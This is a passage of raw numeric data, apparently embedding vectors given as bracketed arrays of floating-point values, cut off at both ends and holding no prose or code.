7,0.02087036,-0.0037703943,0.0073862914,-0.014113711,0.028693423,-0.0101802265,0.0013820673,0.025328634,-0.019674484,-0.0056815576,0.015625507,-0.010108592,0.04810137,-0.0064959084,-0.0092020165,0.0060448265,-0.0058308095,-0.0062683322,0.009263129,0.0021637033,0.015012933,-0.0103521515,0.00025032475,0.01757264,0.007310243,0.016943721,0.005454739,-0.0019524101,0.00076545705,0.00073080574,0.0075387117,0.0058971616,0.01373889,0.0119532505,0.0033699803,-0.013843332,-0.01994606,-0.007066061,-0.004058671,-0.0049912874,-0.0070884884,-0.009802378,-0.0065396144,0.01132262,0.022381457,0.0065005515,-0.019934554,-0.011704044,-0.00077131455,-0.009284466,0.009435487,-0.026024971,-0.0073388084,-0.008372106,-0.00887124,-0.003336023,-0.032739203,-0.008046839,0.0064278473,0.016813338,0.014758733,-0.031591367,-0.016838241,0.0018778637,0.0035595635,0.0010246935,0.013399422,-0.018174745,0.009199154,-0.0012982496,0.0039630905,0.009727914,0.014469306,0.011062633,-0.010641966,0.0026403882,0.00903191,0.003975952,0.0053637708,0.013468775,0.117710054,0.039813586,-0.0008913561,0.008969199,0.009756862,-0.0021007357,0.032278076,-0.0053208545,0.026234802,0.00562613,0.0046274047,-0.008196912,-0.005861291,0.0011193844,-0.022198956,0.0052885674,-0.000983348,-0.00055244414,-0.0020728728,0.013443863,0.014408465,-0.021646183,0.014566913,-0.031855512,-0.0032307268,-0.0359743,0.0035043948,0.030283717,0.00019722326,0.016450042,0.018549534,0.011290338,0.024739046,-0.005161657,-0.0057305,-0.017736744,0.024253637,-0.014736902,-0.008333125,-0.010196086,0.022552967,0.01591208,0.01306299,-0.008126744,-0.018180901,-0.0013053828,0.0022496942,-0.0071922126,-0.0023838559,-0.010517788,0.010593004,0.022970807,0.009242351,-0.0056945276,0.0060913893,0.0025448254,-0.008417651,0.0067335567,0.0060941055,-0.00851388,0.030711064,-0.012693775,0.0080364905,0.008793168,-0.003867542,-0.006829093,-0.003344876,-0.0033523887,-0.038074844,-0.029041788,0.027689584,-0.017988548,0.017504757,0.0014500626,-0.01042614,0.008912514,-0.011480183,-0.034591593,-0.002901161,0.009151894,-0.007637613,0.022983566,0.00054721866,-0.009651436,0.019712767,-0.0043623396,0.0077899136,-0.0043859575,-0.0015450978,-0.009564636,0.019452935,0.008399458,0.011828175,0.006144903,-0.0055005555,-0.014941647,0.023493817,-0.006197706,0.0034956736,0.001243737,0.013714308,-0.0068265246,-0.012103385,-0.0064721014,-0.01460158,-0.00328736,0.006343709,0.024482902,-0.008306543,-0.0063424157,-0.0056590405,0.007913761,0.03563558,-0.0013237216,-0.005943504,0.008152357,-0.018695643,-0.029623058,0.008508447,-0.009587459,-0.017991398,0.009495999,0.03069697,0.027621571,-0.0053304257,0.02799897,-0.015640698,0.0023523422,0.009900546,-0.00003777596,0.015753234,-0.028122962,-0.025043229,0.0056212344,0.0015346672,0.008497935,0.025061041,0.019869836,-0.020557275,0.014845465,0.02111597,0.005343931,0.0031813567,-0.004350353,0.015119468,-0.0055955555,0.029046422,-0.0032515316,0.011091497,0.005847569,-0.000033101234,0.0015431282,0.0076476303,0.0026270822,-0.008636626,-0.011899796,0.009736044,0.0075223115,-0.024564277,0.0075964737,0.015969958,0.0066859443,0.010843688,-0.046033204,0.0119930245,0.015892694,0.010637078,0.0013234055,0.011579351,0.010795127,-0.004938229,-0.0028224667,0.009453951,0.028901577,0.004009355,-0.007855355,0.021711223,0.029025724,0.002246602,-0.0027646977,0.007934399,0.036405843,-0.012019825,0.0115233,0.012499345,0.00021258525,-0.006863121,-0.0030126628,-0.0020479038,0.035414092,0.0026026703,0.015360529,-0.0008237629,0.016069783,-0.015868558,0.011489097,-0.03679645,0.06430862,-0.022703096,-0.029645655,-0.0066910856,0.00022976872,-0.0024207304,-0.0013648248,0.0038856918,-0.0130537655,0.00029658055,-0.014074342,-0.010231195,0.0035049922,0.015312276,0.0014375345,-0.003100304,-0.007977512,0.0039059417,0.0218837,-0.027184946,-0.010519223,-0.015528771,0.008245817,-0.00048031358,-0.014320834,-0.020421833,-0.016600825,0.0077802246,-0.009463921,0.0050055617,0.02546137,0.0025101707,-0.022684976,0.004691444,0.010402969,-0.015782803,-0.0080727255,-0.0055480828,-0.005203868,-0.0025423488,0.018347992,-0.024490593,0.009727571,-0.008204081,-0.0057822075,0.010488202,0.010491329,-0.009062413,-0.008505213,0.012449021,-0.01826201,-0.021842824,-0.0050602104,-0.0069798287,-0.001233028,-0.027370678,-0.01039893,-0.008902929,-0.019859675,-0.0062823477,0.022620805,0.0061738607,-0.017844278,0.009416509,-0.0017845322,0.010009318,0.00620832,-0.010897574,0.0065059955,0.02359338,-0.0055866907,0.0056646904,-0.01003842,-0.020251652,-0.007876707,-0.0047266264,0.0009082532,-0.012207115,0.009899457,0.006641539,0.0060833665,-0.005005152,0.007940891,0.0073617175,-0.010644202,0.015897911,-0.032825723,0.019325461,-0.0072780624,0.01469889,0.00079953606,0.04314881,-0.06432926,0.007189177,0.017686596,-0.0131939575,-0.020690119,0.02924514,-0.004877771,-0.071514435,-0.016382018,0.03206089,-0.0028418256,-0.0053985524,-0.027726153,-0.0031401,0.009537309,-0.0010806277,-0.010687352,0.004696871,-0.022374516,-0.023056196,0.02710804,0.017546251,0.0032141178,0.003802263,0.00139825,-0.001047841,-0.01154006,0.012767237,-0.012929467,0.0052958275,0.005934968,0.017611485,-0.025782026,0.0047823125,0.0064026606,0.015216002,-0.00427421,0.022003885,-0.016415678,-0.015233456,-0.024029028,0.011283344,-0.0089337295,0.016563669,-0.0004738495,-0.015618444,0.010868744,-0.01079661,0.17000777,0.0037656187,-0.0058751632,-0.02186605,-0.006544487,-0.025474569,-0.006948028,0.020316007,-0.0054071415,0.01866242,0.005810599,-0.017527813,0.0004346667,0.0069069616,0.021769963,-0.010066742,0.01975452,0.1559726,0.0036284428,-0.0035007081,0.024172084,-0.018349342,0.026019432,0.004447362,0.016788732,-0.07737188,-0.0070607043,-0.03165754,-0.00014997943,0.0012997984,-0.020720225,0.02299686,-0.013269402,-0.022093238,0.003614382,0.0094216885,-0.0011482829,-0.0128906155,-0.020739181,0.0006102304,0.012921962,-0.006768556,-0.0032540716,-0.004425757,0.008527288,-0.016029565,-0.0040450157,-0.012448447,-0.0077697784,0.011646267,0.0072187567,-0.0025334095,0.015933853,-0.0045524556,0.0055355085,0.008687887,-0.007190428,-0.0043706642,-0.030533547,0.019156089,-0.001000434,0.017267961,-0.021532072,0.006983756,-0.016245082,-0.008543263,0.012396137,-0.008873714,-0.008924842,-0.007208647,0.008895643,0.002779379,-0.0063157855,0.009411828,0.012561162,0.0043349885,-0.007323287,-0.010229374,0.007079022,-0.021969553,0.016978946,0.002016032,-0.011679862,0.009732944,0.0073542832,0.014706934,0.0155256605,0.0155150965,-0.011937543,0.012246034,-0.013811661,-0.008862915,-0.008409518,0.0083435485,0.0030760565,0.017026061,0.0038281202,0.00061940664,-0.010917244,-0.011277893,-0.016851477,0.03074049,0.011592019,0.0063316924,-0.013133188,-0.0021401762,-0.0067534302,-0.00693077,0.0031868531,0.009855768,0.0046135182,0.012623892,0.0056695747,0.002791958,-0.0014289954,-0.014381239,0.017701542,0.03290064,-0.03426245,0.0035106651,0.016584259,-0.017615873,0.021177398,-0.020352555,-0.02120142,0.025082614,0.014079614,0.038160924,-0.01174812,0.0012131113,-0.0077932957,-0.016575346,0.0065082964,0.024341725,0.014423313,0.002989143,0.015313396,-0.025245266,-0.0025413819,-0.0036025066,-0.006286616,0.024192993,-0.013284371,0.01302866,-4.0792788e-8,0.0051441942,0.020071946,0.0042708367],[0.0045625735,-0.0017821323,-0.002464244,-0.006875969,0.00059313804,-0.023521757,-0.0013705376,0.02136736,0.027688034,-0.005531568,-0.0068303444,0.041148838,-0.0037415104,0.010956986,0.0134754805,-0.0009150897,0.008451757,-0.001366905,0.0023901467,-0.00130884,0.013035969,-0.009389245,0.024368979,-0.019020228,0.016951958,0.009436252,0.002130199,-0.0029759705,-0.0046301796,-0.008045803,-0.002743297,0.018424353,0.006097954,-0.009620032,0.01889852,0.011367087,-0.0019116772,0.0024513192,0.008769228,-0.017323192,0.013933761,0.0038235772,-0.015771668,0.005469021,0.00097380177,-0.010958225,-0.0050405944,-0.02088287,-0.019232405,0.016928,-0.00127875,0.011107463,-0.012967942,0.01048056,-0.010554134,0.008388437,-0.0041828463,-0.05152714,0.018158741,0.0064260256,-0.005921696,0.0224978,-0.0073687015,0.002466895,0.025778553,0.020286478,0.010165896,-0.012619423,-0.017881911,-0.015008148,0.016660249,-0.007329989,0.0028619624,0.010805652,0.015618141,0.0076802033,-0.007664579,0.0062996247,-0.016608676,0.0015812173,-0.0385651,0.0017706654,-0.0017696555,-0.0070500504,0.006337155,0.008500847,-0.01538284,-0.0003895671,-0.007140012,0.0066973227,0.004350549,-0.001321527,-0.0071142693,0.014749786,0.009855908,0.011038685,0.009897791,0.009129592,-0.011248643,-0.0031719836,-0.0151849305,-0.018742803,-0.028047638,0.012791728,0.002212697,0.0043560727,0.0029239163,0.007892287,0.007721634,-0.016907224,0.0017159209,-0.009115786,0.0055616996,-0.0038445913,-0.0000018002278,0.0017870308,-0.009943548,0.0042512245,0.00069580745,-0.012508183,-0.008067059,0.00036814463,0.013627322,-0.0022835024,-0.0039424645,0.00475922,0.010314734,0.006868007,0.0010963961,-0.024910906,-0.00461166,0.027237326,-0.00760641,-0.0010865094,-0.0040321546,-0.009021866,0.008884017,-0.0029806118,0.01999253,-0.022823144,0.0051286076,-0.0016273055,0.030151471,0.00016386021,-0.0054301177,0.0032832462,0.0035152095,0.00407791,0.010149042,-0.009275322,-0.012501379,-0.0055272137,-0.010273393,-0.010237206,0.0017004994,-0.0064755445,-0.03033486,-0.018510334,0.0032995478,0.0053247833,-0.005309568,0.0063984846,-0.0013582647,0.01718387,-0.005929227,-0.0038178107,-0.007830765,-0.008626123,-0.0068785786,-0.008961326,0.0041439994,0.013734311,0.023556283,0.0016687076,0.0016494947,-0.0036379439,0.0061490894,-0.0069055404,-0.011381215,0.0056327246,0.010679999,0.010287544,-0.009388316,0.0017631748,0.02089946,0.02390166,0.020584097,-0.0038011128,-0.0034903989,-0.011117945,-0.005613458,-0.0019444941,-0.0028820476,-0.008503667,-0.0049739387,-0.032082986,-0.017594526,0.13440165,-0.01076715,-0.017522298,-0.019477751,-0.009140313,0.013288137,-0.025240658,-0.023458324,-0.00583273,-0.012976928,-0.0075833662,0.007975653,0.005724125,0.023486074,-0.010036456,0.009079718,0.0027398134,0.019776294,-0.073179826,0.0070326594,0.01781563,-0.019727608,0.010725361,-0.0035926832,0.01099359,0.00984157,-0.00783633,-0.013855058,-0.004800891,-0.00081347686,-0.0013394031,0.0014962298,-0.024984207,0.004205072,0.01172437,-0.034116074,-0.022732368,0.00021908579,-0.027429996,0.01593608,-0.012920699,0.01078518,-0.0048946366,-0.032175183,-0.0034496624,0.015970943,0.00697468,-0.00088219554,0.005716488,0.020675065,0.0043106964,-0.013465628,0.0033461193,-0.0056067924,-0.03011465,0.0032324938,0.029511523,0.0045549986,-0.020509547,0.003468169,-0.0041722865,-0.0056257425,0.00743665,-0.0007690978,0.017234668,-0.022204917,0.010346224,0.026922118,0.00617519,-0.0052846256,-0.03723874,-0.009443141,-0.0358664,-0.046522673,0.0066709723,0.025293797,-0.020774493,0.006762091,-0.0044930237,0.029489156,-0.0062565254,-0.0060965726,-0.0071977777,-0.0031584993,0.0072610886,-0.013217627,-0.0057237064,-0.012253925,0.011954469,0.032553405,0.0040853187,0.024527654,-0.005992843,-0.0059847487,0.01757247,0.012225788,-0.009226038,-0.013227053,-0.01387735,-0.033365235,0.032268852,0.014864641,-0.001709124,-0.00008560663,-0.008180528,0.02979341,-0.007041934,-0.0139742615,0.0028543046,-0.0015296144,0.00062883395,-0.0040796157,0.019888489,-0.007983257,-0.003681952,-0.007791495,-0.005040127,0.007407114,-0.003017151,0.004965186,-0.015023874,-0.020452373,-0.0015223894,0.01806724,-0.014529304,-0.006795609,-0.023670394,0.0132616125,-0.0010773534,0.022188623,-0.009023379,0.01561789,0.025674224,-0.0006974965,-0.009330606,0.014233152,0.023687195,-0.029935107,0.012442895,-0.00018953068,0.023096034,0.0013436003,0.028131802,-0.014907441,-0.00094673847,-0.019962104,0.009944229,0.0030380466,0.010534802,-0.007084717,0.0058904486,0.009545326,0.006771345,-0.007837618,-0.01405832,-0.022931935,-0.009666877,-0.01011665,-0.018340988,-0.035981506,-0.014080625,-0.027913565,-0.0013213248,0.019362824,-0.0012602152,0.022643035,-0.01646201,0.093591824,0.0025856942,0.0094225425,0.01066493,-0.013120583,-0.0032272972,0.052914202,0.020241551,0.010389249,-0.014862363,-0.006227504,-0.024125526,-0.010333577,0.014640466,-0.020919379,0.0048420154,-0.01854961,0.0015561994,-0.029541358,-0.029229539,0.041745722,-0.0018351756,-0.018525971,0.009479578,0.023101239,0.011846598,0.00818696,0.005322842,-0.011294386,-0.015329734,-0.017525416,0.005213491,-0.0009179211,-0.011133295,-0.02105347,0.014502334,-0.007002919,0.000063854735,-0.010585967,0.002547696,0.0025472413,-0.0048567518,-0.0035842955,-0.010090369,-0.0053949035,0.030657556,0.0025279114,-0.0020021284,-0.00875248,0.007960861,-0.00010685087,0.018092655,-0.035559032,0.02023613,-0.016193423,0.018929169,0.011683301,-0.04175909,0.03874071,0.025801176,0.015446971,0.028855996,-0.041101795,0.022459973,-0.009425637,0.028440489,-0.013332893,0.006301258,-0.008075361,-0.019679474,0.014183869,0.0052291676,-0.0023831346,0.0038888159,-0.0042934986,0.0024076751,-0.012994609,-0.0017248547,-0.0113702575,0.02346777,-0.004684735,0.0036728962,0.0038424297,0.0033639425,-0.011908989,-0.0013723243,0.004057359,-0.012128808,0.012520615,-0.01800369,0.041539438,-0.00017888306,0.034051076,-0.015572182,0.017687637,-0.002956653,0.028809758,0.0016372978,-0.0013622524,-0.0006758086,-0.024436982,0.008820302,0.023444392,-0.0066930214,-0.00019826824,-0.0013261909,0.0023719084,-0.008210947,0.0016168465,0.030724777,-0.019953718,0.016892537,-0.013499121,-0.010247038,0.0055293054,-0.0036875345,0.003097814,-0.00032942154,-0.007853828,0.021008017,0.02331718,-0.008332448,0.01802304,0.011155251,-0.01727707,0.0056623286,0.0048450674,-0.00050310406,0.021282915,0.016031904,0.01940647,0.02274029,0.0027793327,-0.023386734,0.008782647,-0.003770478,-0.009755389,-0.007984794,0.022554824,0.014480145,0.011896628,-0.00013822566,0.016614236,0.024031969,0.008710132,0.033741415,0.022731012,0.005734717,-0.00047436505,-0.018254004,0.0071109803,-0.012035837,0.016654037,-0.011025663,-0.010169987,0.020317616,0.039967664,0.0068211625,-0.036038622,-0.012032836,0.050779432,-0.018881215,0.009850692,0.011646019,-0.01669287,0.01402433,0.006564834,0.10620588,-0.0046190354,-0.04172211,0.00060155103,-0.0060192463,0.006737082,0.0022634557,0.000019128991,-0.00657355,0.0013032971,0.0044304333,0.006151533,0.016365422,0.030267948,-0.0049960795,-0.01023531,-0.00085052196,0.01562958,-0.010528538,-0.0018657653,0.008128774,-0.001946057,-0.0017387893,-0.025787752,-0.0037803592,-0.0091449665,0.019966751,0.007832489,0.001977258,0.0030313488,-0.015036879,0.0028212587,0.0054822005,-0.0037242437,0.004401356,-0.0014642031,0.008984528,-0.005229842,-0.0023085228,0.041920584,-0.011579152,-0.0046883053,0.012143555,0.011321115,-0.014579001,-0.011572702,-0.012412163,-0.013141122,0.012578005,0.0015462139,-0.0051379916,0.012080832,0.029210836,0.009282619,-0.003828619,-0.017348567,0.020276403,0.02102288,-0.018153781,0.007900179,-0.0069842716,-0.0033384757,-0.013977847,-0.0052494635,-0.0058941324,-0.008403678,0.027790714,-0.010033994,-0.00013518895,-0.03613666,0.018057924,0.007487962,0.0060386728,-0.001396612,0.015839143,0.00598029,0.016749853,0.019126367,0.009012157,-0.021954112,0.0001620994,0.0062474576,-0.010670355,-0.027470931,0.007035723,0.005404724,-0.017209083,0.0019228832,0.0060113613,-0.02222961,0.01055644,-0.0037783273,0.0046643773,0.002881827,-0.0049200915,0.02086375,-0.008045356,-0.023749048,-0.00447621,-0.0042072013,-0.026753394,-0.014789366,0.0038208615,0.025610277,-0.006673034,0.019970639,0.012145246,0.014881748,0.006955893,-0.017770981,-0.0028657906,-0.06013439,0.020403054,0.028678294,0.0047713174,-0.012719561,0.030316968,-0.023060877,-0.0019622862,-0.007483504,-0.0036917133,-0.023956163,-0.0130120255,-0.0037999004,0.0002884833,0.020440947,-0.006912944,-0.03290272,-0.017146058,-0.01519364,-0.05686017,0.0061698677,0.045949608,-0.01192921,0.005847782,0.0060856584,0.0017502928,-0.008801042,0.0016719503,0.008346566,-0.01904271,0.003726065,0.0092383865,0.014476205,-0.022106262,0.014047358,-0.0014395734,-0.013000532,-0.00027317108,-0.014522464,-0.012299532,0.0015846842,-0.017379086,-0.0063529364,0.005503836,0.0025187428,0.024364842,-0.014092061,0.019811692,-0.004553497,0.04252761,0.002756281,0.0034530652,0.0010693417,-0.0088120755,-0.004283736,0.007714167,-0.009896007,0.04141779,-0.005135707,-0.009590447,0.0011812395,0.015305628,-0.009338519,-0.01222547,-0.00016528828,0.018813446,0.016886186,0.0011455787,-0.0022025402,0.008563698,0.015251882,0.022058731,0.0027756433,0.0022494062,0.019108584,0.009355276,0.016084095,0.025780078,-0.00091014704,-0.022214467,-0.0028875717,-0.02135496,-0.021209275,0.022564035,0.014069878,-0.0151329525,0.030215692,-0.012902952,-0.009428866,-0.019240817,-0.0066243815,-0.0016074927,-0.017791966,0.009627928,0.007193063,0.0060951374,-0.0024362155,-0.041163404,-0.008251009,0.014571949,-0.0043416778,-0.02227102,-0.005152941,-0.006297879,-0.007649661,-0.010030818,-0.012054247,-0.019552127,-0.005833898,0.0142061915,-0.005910543,0.016722027,-0.0005269674,-0.0030558486,-0.0036613552,0.026796278,0.0033784364,0.007779815,0.0045790444,-0.007219296,-0.004158416,0.03347372,0.007102528,-0.01963945,-0.001615938,0.013163682,-0.011697956,-0.011513239,0.0075138626,0.011649983,0.044159826,0.012488911,-0.024740687,0.0017985817,-0.005120847,-0.005473972,0.016125042,-0.022081325,-0.013825609,-0.011358255,-0.0028242928,0.0019551166,0.031013887,-0.011213621,0.03166937,0.009113024,-0.005677729,0.005023221,-0.011737236,0.031664774,0.0158012,0.016947156,-0.023259271,-0.013006384,-0.018281283,0.04347024,0.012914977,0.0038134106,0.010102958,-0.02629922,-0.012522615,-0.008157333,0.009871064,0.0041681295,-0.0047543556,0.0063054417,-0.041790247,0.0012735403,-0.0011812869,0.0055354163,0.007886689,-0.0095697045,-0.041581906,-0.021342602,-0.0033932517,-0.027315145,-0.022824716,0.013938591,-0.014150667,-0.01176036,-0.00550064,-0.017098794,-0.02621415,0.00810038,0.009143634,0.006388981,0.020663122,-0.010073282,-0.008550348,-0.0045859814,0.0077434536,-0.00920085,0.010391187,-0.025403699,-0.010367262,-0.004431675,-0.003887916,0.009607256,0.003409845,-0.013230265,0.025443675,-0.006261096,-0.02655289,0.025253132,-0.0054767355,-0.0048158243,-0.015630314,-0.011331237,-0.007166597,-0.0016525501,0.012851462,0.0031850515,0.011600387,0.0040235585,0.00054884277,0.018945275,0.0043661185,-0.008200634,-0.016448611,0.0036382398,0.004239639,-0.01792841,-0.014291389,0.008202575,-0.0062247864,-0.0016837051,-0.00025638373,0.023731977,0.0013257946,0.009842062,-0.007929383,0.03087378,-0.008034216,-0.040502302,-0.00067376794,-0.013943389,0.005246453,-0.002141311,0.002386665,0.009904162,0.017301599,0.010290102,-0.0041410397,0.004811745,-0.023623524,0.0021250532,0.010116377,-0.004500091,-0.023314519,-0.008554131,0.010554808,-0.044752367,-0.0100192195,-0.018077334,0.009950729,0.005114522,-0.031180408,0.011150516,0.0017930382,-0.012482495,0.011652856,0.008498185,-0.0029580884,-0.01563856,0.013831729,-0.006284168,0.017413914,-0.0038467883,-0.009364757,0.028060794,-0.004087875,0.0194569,0.0154897645,0.0292907,-0.018618401,-0.0005707723,-0.005479055,-0.014643159,0.03596835,-0.006900159,-0.018311841,0.031863738,0.030658053,-0.02405,0.008702327,-0.020977274,-0.004276177,0.02862743,-0.0075036394,0.026510246,-0.0074089803,0.030967465,0.008467512,-0.017518954,0.011410879,-0.012935042,-0.05263241,0.03117935,0.0072246757,-0.0047139027,0.011235802,0.012065443,0.009489947,0.0020904825,0.024291513,-0.016660027,0.012053643,-0.000025122092,-0.010936644,0.00076198665,0.017021494,-0.016644973,-0.017484404,0.031653713,0.01210541,0.0100772735,-0.0071516875,-0.009753893,0.012657603,0.010687576,0.008365098,-0.010456235,-0.000829889,-0.0042979377,-0.005156651,0.024086844,-0.0025288751,0.0023316368,0.0066009373,-0.0022495033,-0.0064731017,-0.020637047,0.009353171,0.030270401,-0.016981373,-0.017113129,-0.005100281,-0.013085201,-0.005592805,0.03175909,-0.0142634725,-0.01401171,-0.008782555,-0.00937715,-0.0006231718,-0.005797268,0.021346195,-0.014198342,-0.0031820503,0.023014514,0.022789357,0.025954561,-0.0017276618,-0.005874546,-0.010250569,-0.001412041,0.0120427385,-0.008700358,-0.006011679,0.00911656,-0.027600665,-0.021147557,0.009970341,0.01621596,0.015712447,-0.00400035,-0.008992099,-0.010873934,-0.0023811127,-0.0013666805,-0.019871203,0.03312284,0.022939939,-0.013471565,-0.0045377994,-0.026893228,-0.01161605,-0.014220133,-0.027949113,0.0050033643,-0.012292898,0.017077196,-0.010282472,-0.0078054857,0.01329184,-0.023526223,-0.005236293,0.001345704,0.009711492,0.010606254,0.0132163605,-0.000192299,0.007481129,0.032254066,0.0009769516,0.002750261,0.0021325424,-0.008007778,-0.0136309555,0.044841245,0.00012921513,0.0010323882,0.0058878465,-0.0004726336,0.015240808,0.02575138,-0.0030306194,-0.013358481,0.008477949,-0.010727633,0.026769007,-0.035232287,-0.0011137921,0.011571184,0.052801296,-0.0050340076,0.0015146547,-0.014517393,0.026337259,0.0066799102,-0.016625917,0.009312397,0.015874643,0.010274041,-0.008964782,0.02391746,-0.005150271,0.022628274,-0.005511316,-0.010815501,0.02113064,-0.008971875,-0.0067302426,0.0003555073,-0.008345685,0.008446406,-0.01907469,-0.0150037445,-0.017514246,0.024574876,0.006693509,-0.00022269711,-0.0079225255,0.015337572,0.0064283614,0.02932854,0.004651106,-0.010229884,-0.0032135407,-0.008000503,-0.011464518,0.014500233,0.006390186,-0.024922632,0.0067038094,0.01229785,-0.00950421,0.0006782404,-0.0124187255,0.00856588,-0.02783221,-0.01827518,-0.014869502,0.015537346,-0.0006265456,-0.009784923,0.008127671,-0.0012994843,-0.01135227,0.045419455,0.017871238,-0.002919511,0.012824258,0.0017645109,-0.018863682,0.002243581,0.0004081576,0.023289833,-0.002070528,0.013826692,0.023702748,-0.0020311864,-0.0048403256,-0.0008428786,-0.026761632,-0.020091932,0.007118889,0.025114117,-0.0017844472,0.0039533586,-0.018962227,-0.0051629753,0.010643066,0.018914206,-0.0027787231,0.00032517614,-0.006847593,0.022308467,0.003982658,-0.004677776,-0.008434342,-0.0027576634,0.017157726,-0.023374874,-0.007831802,0.0064413343,-0.016714588,-0.008218005,0.002804179,0.0096509885,-0.032561693,-0.009680745,-0.025656914,-0.008727211,0.010193127,-0.015901329,0.006683911,0.011909593,0.010904294,0.0067224437,0.0015614934,-0.02127358,0.02303231,0.006235527,0.0003672828,0.012275483,0.028257314,-0.02176161,0.04243243,0.0036918246,-0.020141969,0.008784453,-0.011065793,-0.0027370579,-0.01641703,-0.022761375,0.0053543905,0.01464357,0.0043023294,-0.0027752796,0.016583424,0.031155337,-0.003368892,-0.0019787592,0.0006415904,-0.0043107206,-0.006081878,-0.016092367,0.011748848,-0.017550133,-0.0006834127,0.003080675,-0.0061745467,-0.010049521,0.0017255078,-0.008886422,0.007090019,-0.017054569,0.00041689273,0.0028016563,0.015179843,0.0067056,0.029842518,0.010499881,0.006299003,0.004571098,-0.032177676,-0.012238399,0.011559632,-0.012064494,-0.013489612,-0.003710903,-0.012492864,-0.012131951,0.017942403,-0.002005398,0.009967953,-0.01485205,0.012402164,-0.032867163,0.017807374,0.028726919,0.01471426,-0.029214744,0.018368741,-0.019675761,-0.0011681347,0.004798549,0.0042018495,-0.0076987725,-0.00014333376,-0.01640043,0.008438408,-0.0044987933,0.014524771,-0.024509432,0.045248713,-0.011179907,-0.007287876,-0.020240966,0.007280774,-0.031395976,0.010909313,0.017051587,0.006232512,-0.0070225624,-0.035911426,-0.020187084,0.009366676,-0.027586829,0.007966505,-0.0066460483,-0.006670899,0.01335496,0.0072109583,0.01170358,0.000039324823,-0.004528597,-0.006776417,0.011597139,-0.022424184,0.019977149,0.0042556114,-0.0016026703,-0.007995749,-0.001608972,-0.00019884053,-0.003111996,-0.016519567,0.009142351,-0.0055562677,0.00698011,-0.0019850968,-0.01563248,-0.031443946,0.000565105,0.018667646,-0.001134735,0.072666585,-0.005532997,0.0028851763,0.0034685265,0.00082004035,-0.0058165714,0.027230902,-0.007447602,0.009112022,0.017975457,-0.0130314,0.0060771927,-0.014081344,0.024607552,0.006244026,0.009414638,0.01711513,-0.0035475155,0.00562495,-0.010786436,-0.01418675,0.012626972,-0.012698469,-0.019328574,0.03390512,-0.016267851,-0.008439978,-0.032458887,-0.008885824,-0.0077291294,-0.024989566,-0.025516735,0.016286701,-0.0071272557,0.030726846,-0.014098644,-0.012893663,-0.00031787143,-0.009752916,-0.022101857,0.04079393,0.004060904,0.0008416897,-0.0068673547,0.010326847,-0.012485983,0.10263623,0.023776904,0.021720098,0.00006613218,-0.005284279,0.026678532,-0.010278453,0.025692947,-0.0012984844,0.014126676,-0.0006038147,0.0073136827,-0.0069657094,0.010209319,0.009822345,-0.0033310137,-0.025132293,0.0027496675,0.016766822,-0.016456453,-0.002314089,-0.009641012,0.017011844,-0.005303453,0.018358238,0.025178103,0.016475828,0.0018528987,0.01599364,-0.007963404,-0.0030662834,0.00091043767,0.007827168,0.017186614,0.0084727565,-0.047146663,0.021641858,0.18412201,0.003950252,0.0074284375,0.014187862,-0.013743533,0.012773147,-0.07936461,-0.0073289894,-0.005976963,-0.0008662913,-0.010478617,-0.025320495,-0.018548567,0.029289057,0.012436894,0.01550307,0.0048643285,-0.029561063,0.017385162,-0.021484757,0.010231847,0.0075393333,0.0017520746,-0.0034415578,-0.014371122,0.00877801,0.01736742,-0.018935252,-0.011791925,0.0021338006,-0.00797962,0.012040519,0.017592812,0.0010549236,-0.017325986,0.014133395,0.011202214,0.01018722,0.007860452,-0.033802617,0.021012407,0.0020041056,-0.021218346,-0.039894387,-0.16640571,-0.00010358591,-0.008795142,-0.030675095,0.015847914,0.009273242,0.007196339,0.0009575737,-0.005164387,-0.021759521,-0.013695755,0.0002379273,-0.0011021559,0.0027842298,-0.00072587974,-0.007945909,-0.010566917,-0.008605687,0.0011610105,-0.0142067475,0.019978851,0.02476858,-0.020359484,-0.020322306,-0.0063439873,-0.013019783,-0.0007049357,0.012172228,-0.017094554,0.011870397,-0.02655044,0.015800687,-0.019321254,-0.008278378,-0.008823338,-0.024535095,-0.024033714,0.009156249,-0.024702614,-0.01182649,-0.01434156,-0.011497855,0.0063403645,-0.010226848,0.0012178462,0.028044416,0.014313463,0.012139241,0.007436365,0.01062858,0.044078104,-0.009160332,-0.02886315,0.008561701,-0.0078801755,-0.0036083409,-0.006563312,-0.029839657,-0.027698034,0.0009920902,-0.0065361415,-0.0039406638,-0.010034877,-0.018382512,0.030910732,-0.013644525,0.006669406,-0.013571434,0.0038177788,0.00773448,-0.010625431,0.0019917567,0.021352243,-0.033373017,0.021780998,0.029721152,-0.018654974,0.00048487794,0.01767212,-0.013181983,-0.011130354,-0.011440497,-0.0031910616,-0.030968409,-0.010355923,0.0017636641,-0.032972198,-0.009789715,-0.013183899,0.0015592321,0.010259336,0.014192987,0.037152726,0.020324407,-0.006606167,0.007333205,0.029013224,0.020796943,-0.03087652,0.012338691,-0.0016900898,-0.031199673,-0.014030861,0.008179331,-0.020133767,0.0016082769,-0.010251846,-0.016912365,-0.022853708,-0.006205087,-0.00500201,-0.00032785677,0.004189631,-0.006246701,-0.0296102,-0.023376867,0.023189794,0.015340796,0.0019407845,-0.02061694,-0.033869464,-0.009639454,-0.0011397927,0.019603325,0.034174625,0.00044802637,-0.03212011,-0.004182522,0.0078036697,-0.022250462,-0.01982597,0.002408947,-0.00032435526,0.022111492,0.0065242425,0.017805522,-0.017416362,-0.002840219,-0.027954511,-0.0110026235,0.0048622326,-0.014199795,-0.011785246,-0.01822888,0.029595403,-0.016094659,0.028970499,-0.008555379,0.024545819,-0.004943548,-0.013104898,0.04190744,-0.014777,-0.02316517,0.0026270442,0.09049084,-0.0033885057,-0.017143032,0.00060607825,-0.01548471,0.015351578,0.008858324,-0.001152835,-0.00830568,-0.027205545,-0.032920882,-0.000017354945,-0.018026661,0.013393831,-0.013257738,0.019463707,0.0016589236,0.0074709747,-0.004384978,0.0035656726,0.009356447,-0.0177912,-0.0005031662,0.039336644,0.021156419,-0.0067019714,0.009207504,-0.00052832754,-0.012848086,-0.00728674,-0.012814855,-0.003508647,0.006827088,-0.0052091563,0.009399549,-0.056547385,-0.00911073,0.0052735573,0.015879402,-0.008539279,0.01115527,-0.0016122335,0.0103841275,-0.032548618,0.013575295,0.008244281,-0.013810404,0.018883439,0.004498569,-0.017367093,0.0032762224,0.029018693,0.00025431882,-0.021165093,0.003148467,-0.023307517,0.0064896066,-0.01786576,0.00052376353,0.0032845468,0.024004241,-0.01404903,-0.009303223,0.011503196,0.0035455006,0.00986534,0.005701517,0.009783164,0.026636435,0.021661144,-0.013272455,0.0029981455,-0.017336536,0.01366811,-0.00044678367,-0.0040486166,-0.01029386,0.01